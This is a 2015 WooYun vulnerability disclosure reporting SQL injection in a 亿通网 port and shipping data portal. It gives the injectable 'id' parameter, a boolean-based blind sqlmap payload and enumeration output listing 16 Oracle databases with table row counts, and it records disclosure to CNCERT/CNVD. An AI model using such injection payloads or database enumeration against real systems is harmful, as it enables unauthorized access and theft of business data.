亿通网某信息系统存在SQL注入涉及16个库泄漏海量信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146164

漏洞标题：亿通网某信息系统存在SQL注入涉及16个库泄漏海量信息

漏洞作者： Looke

提交时间：2015-10-12 18:28

修复时间：2015-11-30 15:46

公开时间：2015-11-30 15:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-12：细节已通知厂商并且等待厂商处理中
2015-10-16：厂商已经确认，细节仅向厂商公开
2015-10-26：细节向核心白帽子及相关领域专家公开
2015-11-05：细节向普通白帽子公开
2015-11-15：细节向实习白帽子公开
2015-11-30：细节向公众公开

简要描述：

详细说明：

http://**.**.**.**/PortInfo/，新系统http://**.**.**.**/dataportal
漏洞地址：

http://**.**.**.**/dataportal/query.do?qn=dp_select_message&id=402803cf4d41f869014e2f3aa87e0064

id参数存在注入

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: qn=dp_select_message&id=402803cf4d41f869014e2f3aa87e0064' AND 8933=8933 AND 'DejF'='DejF
---
[11:30:42] [INFO] the back-end DBMS is Oracle
web application technology: Apache 2.0.63, JSP
back-end DBMS: Oracle

漏洞证明：

16个数据库：

海量信息。估计下大约有三千多W数据：

Database: DATAPORTAL
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| MSKEIR_BIZ_CTNR                | 1528272 |
| Z_DP_MESSAGE                   | 1       |
+--------------------------------+---------+
Database: GCC
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| PBCATEDT                       | 21      |
| PBCATFMT                       | 20      |
+--------------------------------+---------+
Database: EIR
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| MSKEIR_BIZ_CTNR                | 1878592 |
| MSKEIR_BIZ_BILL                | 931845  |
+--------------------------------+---------+
Database: DATAPORTAL_EIR
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| QRY_USER_EXTEND_PROPERTIES     | 3680    |
| QRY_USER_ROLE                  | 1935    |
+--------------------------------+---------+
Database: OPER_CUS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| PLAN_TABLE                     | 104     |
+--------------------------------+---------+
Database: XIB
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EDI_MSGLOG                     | 20203683 |
| EDI_EXPMSGLOG                  | 7650161 |
| EDI_LETPAS_BERTH               | 6451414 |
| EDI_PRE_MANIFEST_VSL           | 934388  |
| EDI_ROUTETABLE_IN              | 3384    |
| EDI_CTNSIZETYPE_MAPPING        | 851     |
| EDI_AGREEMENTDETAILS           | 119     |
| EDI_BERTH_CODE                 | 23      |
| PBCATEDT                       | 21      |
+--------------------------------+---------+
Database: EDI2
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SYS_MSGLOG                     | 18292695 |
| IFCSUM_CTN                     | 12199034 |
| IFCSUM_CGCTN                   | 8147564 |
| BIZ_COARRI_REALTIME            | 7494994 |
| COARRI_SBARGE_CTNR             | 7177440 |
| SYS_MSG_PROCESSLOG             | 6806960 |
| IFCSUM_PARTICIPANTS            | 6392183 |
| SYS_OUT_BIZLOG                 | 5751776 |
| EDI2_SYS_JOB_DETAILLOG         | 4544443 |
| SYS_IN_BIZLOG                  | 4501474 |
| CTNR                           | 4199219 |
| LOAD_UNLOAD_RLT_INFO_BILL      | 4062239 |
| BLCTN                          | 4030205 |
| CLP_CARGO                      | 4026293 |
| CLP_BILL_CTNR                  | 4025852 |
| EDI_LETPAS_BACKUP              | 3927943 |
| IFCSUM_CARGO                   | 3139781 |
| LOAD_UNLOAD_RLT_INFO           | 3053537 |
| CLP_CTNR                       | 3032853 |
| IFCSUM_BILL                    | 2131820 |
| E_CTNR_TMP_BILL                | 1890544 |
| CLP_CARGO_ADDINFO              | 1565538 |
| CNC101_BILL                    | 1499634 |
| LOAD_UNLOAD_WH_INFO            | 1298571 |
| CODECO_INFO                    | 1282985 |
| E_CTNR_TMP                     | 1188628 |
| CLP_CTNR_ADDINFO               | 1124748 |
| CARGO                          | 1112955 |
| CNC101_CTNR                    | 1099001 |
| MFTCS_BILL_INFO                | 859514  |
| LOAD_UNLOAD_INFO_BILL_AGENT    | 846863  |
| BILL                           | 800936  |
| COARRI_SBARGE_VSL              | 632036  |
| EDI2_SYS_JOB_LOG               | 580314  |
| EDI2_SYS_GEN_FILENAME          | 517197  |
| MSK_BIZ_INPORTDATA             | 476663  |
| LOAD_UNLOAD_INFO               | 354090  |
| CODECO_WH_INFO                 | 298290  |
| SYS_OUT_DATALOG                | 275982  |
| CUSTOM_VSLNAME                 | 253656  |
| DSPLST_INFO                    | 177736  |
| CLP_CARGO_LINKAGE              | 129923  |
| CGTRC_SYS_BATCH_LOG            | 118283  |
| CLP_CTNR_LINKAGE               | 111620  |
| EDI_INFO_SYSLOG                | 97510   |
| MFTCS_CTN_INFO                 | 81966   |
| MFTCS_SEAL_NO                  | 81966   |
| IFCSUM_VSLVOY                  | 66627   |
| EDI2_COD_MAPPING               | 57024   |
| IMPVSL                         | 57005   |
| CLP_BILL_LINKAGE               | 53363   |
| IMPVSL_COMSPACE_AGENTINFO      | 52475   |
| CQBCCDCTN                      | 49914   |
| VSLCALLSIGN                    | 28718   |
| BAPLIE                         | 28556   |
| CQ_COARRB_BILL                 | 27988   |
| CQ_COARRB_CTNR                 | 27975   |
| DATAPORTAL_COD_MAPPING         | 15106   |
| EDI_SHMSA_LOAD_UNLOAD_PORTCODE | 10802   |
| SYS_IN_DATALOG                 | 7419    |
| EVG_VESSEL                     | 7274    |
| EXPVSL                         | 6837    |
| NYK_VSL_CODE                   | 6219    |
| EXPVSL_BAK                     | 5998    |
| CNC101_VSL                     | 4451    |
| EXPVSL_COMSPACE_AGENTINFO      | 3594    |
| CQRECEIPT                      | 3517    |
| CMA_VESSEL                     | 3117    |
| CQ_COARRB_VSL                  | 2160    |
| EDI2_COD_MSK_VOYAGE            | 1931    |
| T_WEBUSER                      | 1104    |
| TMP_CLP_BILLCTNR1228           | 1072    |
| TMP_CLP_CARGO1228              | 1072    |
| DP_MESSAGE                     | 899     |
| EDI_CPSHIPS_EMOINFO            | 799     |
| NYK_PORT_CODE                  | 762     |
| COARRB_CTNINFO                 | 759     |
| EDI2_COD_CMA_VOYAGE            | 714     |
| NYK_PORT_CODE_BAK              | 705     |
| TMP_CLP_CTNR_1228              | 697     |
| LOAD_UNLOAD_INFO_20080205_DEL  | 637     |
| CQBCCDVSL                      | 615     |
| REL205_MSGLOG                  | 566     |
| O_QRY_USER_ROLE                | 564     |
| O_QRY_USER                     | 557     |
| CTN_DAM_WH_INFO                | 515     |
| EDI2_CODE_TRANSLATE            | 474     |
| O_QRY_PARAMETER                | 389     |
| EVG_VESSEL_BK                  | 348     |
| O_QRY_PERMISSION_QUERY_ROLE    | 326     |
| O_QRY_COLUMN                   | 315     |
| O_QRY_USER_EXTEND_PROPERTIES   | 293     |
| CLP_CTNR_U20081114             | 289     |
| EDI_CODECO_SENDER_EXCHANGE_BAK | 216     |
| EDI2_COD_MAPPING_BAK           | 187     |
| EDI_SHMSA_OPR_SHIPFIRM_CODE    | 175     |
| T_QUERYCUSTOMTAILOR            | 154     |
| EVG_VESSEL_TMP                 | 153     |
| EVG_VESSEL_20110720            | 152     |
| EDI_SHMSA_UNLOAD_CODE          | 149     |
| O_QRY_QUERY_UI                 | 149     |
| O_QRY_QUERY                    | 139     |
| EDI2_DISPATCH                  | 126     |
| SYS_COD_SRVTYPE                | 80      |
| HJS_VESSEL                     | 72      |
| HJS_VESSEL_BAK                 | 72      |
| NETRPC_TMPLATE_PRINTER         | 69      |
| NETRPC_PRINTER                 | 68      |
| EDI2_BIZ_RSPCOUNT              | 47      |
| TEST1220                       | 39      |
| SHA_LIST                       | 34      |
| O_QRY_ROLE_CATEGORY            | 32      |
| EDI_USER_PORT_CODE             | 29      |
| EDI_QRTZ_SCHEDULER_STATE       | 27      |
| O_QRY_CATEGORY                 | 26      |
| YML_CODE_INFO                  | 23      |
| EDI_SHMSA_PORT_EDI_CODE        | 22      |
| O_QRY_ROLE                     | 18      |
| HYUNDAI_PORT                   | 13      |
| SIN_VESSEL                     | 12      |
| T_QTYPE_LV_AMOUNT              | 12      |
| HYUNDAI_PORT_BAK               | 10      |
| QRY_KEYWORD                    | 10      |
| EDI_OPERATE_LOG                | 9       |
| EDI_QRTZ_FIRED_TRIGGERS        | 9       |
| PLAN_TABLE                     | 8       |
| EDI_INFO_OPTIONS               | 7       |
| EDI_SHMSA_USER                 | 7       |
| CODECO_INFO_PPS_IO             | 6       |
| O_QRY_DATASOURCE               | 6       |
| T_QUERYTYPE                    | 5       |
| EDI_USER_PORT_TYPE             | 2       |
| SPECIAL_BOX_MARK_INFO          | 2       |
| SYS_JOB_LOG_BAK                | 2       |
| TMP                            | 2       |
| EDI2_MSGLOG                    | 1       |
| EDI_INFO_CONFIG                | 1       |
| SYS_COD_DATATYPE               | 1       |
| T_OTHERWEBUSER                 | 1       |
+--------------------------------+---------+
Database: SYSTEM
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| HELP                           | 978     |
+--------------------------------+---------+
Database: SYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| STMT_AUDIT_OPTION_MAP          | 205     |
| SYSTEM_PRIVILEGE_MAP           | 166     |
| AUDIT_ACTIONS                  | 160     |
| TABLE_PRIVILEGE_MAP            | 24      |
| "DUAL"                         | 1       |
+--------------------------------+---------+
Database: GUARD
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EP_ERROR_INFO                  | 63083   |
| WBK_COM_LIST1                  | 4401    |
| TOAD_PLAN_TABLE                | 38      |
+--------------------------------+---------+
Database: EBW
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EBW_BIZ_IFTREP_CTNR            | 1939945 |
| EBW_BIZ_IFTREP                 | 1871352 |
| EBW_BOOKING                    | 1328009 |
+--------------------------------+---------+
Database: XIB3
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EDI_CNC201_CTNINFO             | 3429483 |
| EDI_MSGLOG                     | 2604123 |
| EDI_LETPAS_BERTH               | 2045027 |
| EDI_CNC201_VSLBILLINFO         | 2033212 |
| EDI_CNC201_VSLBILLINFO_ZMQ     | 12162   |
| EDI_ROUTETABLE_OUT             | 484     |
+--------------------------------+---------+
Database: DATAPORTAL_EPEDB
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| Z_DP_MESSAGE                   | 1       |
+--------------------------------+---------+
Database: EPLOG
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WBK_COM_LIST1                  | 16272   |
+--------------------------------+---------+
Database: EPB
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EBW2_ACTION_LOG                | 6778245 |
| EBW2_BOOK_DATA                 | 2270836 |
| EBW2_BOOKING                   | 1735346 |
| EBW2_MBC                       | 740441  |
| EBW2_BLC                       | 267593  |
+--------------------------------+---------+

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-10-16 15:44

厂商回复：

CNVD确认并复现所述情况，已由CNVD通过网站公开联系渠道向其邮件通报，由其后续提供解决方案。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146164

漏洞标题：亿通网某信息系统存在SQL注入涉及16个库泄漏海量信息

相关厂商：亿通网

漏洞作者： Looke

提交时间：2015-10-12 18:28

修复时间：2015-11-30 15:46

公开时间：2015-11-30 15:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146164

漏洞标题：亿通网某信息系统存在SQL注入涉及16个库泄漏海量信息

相关厂商：亿通网

漏洞作者： Looke

提交时间：2015-10-12 18:28

修复时间：2015-11-30 15:46

公开时间：2015-11-30 15:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0146164"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：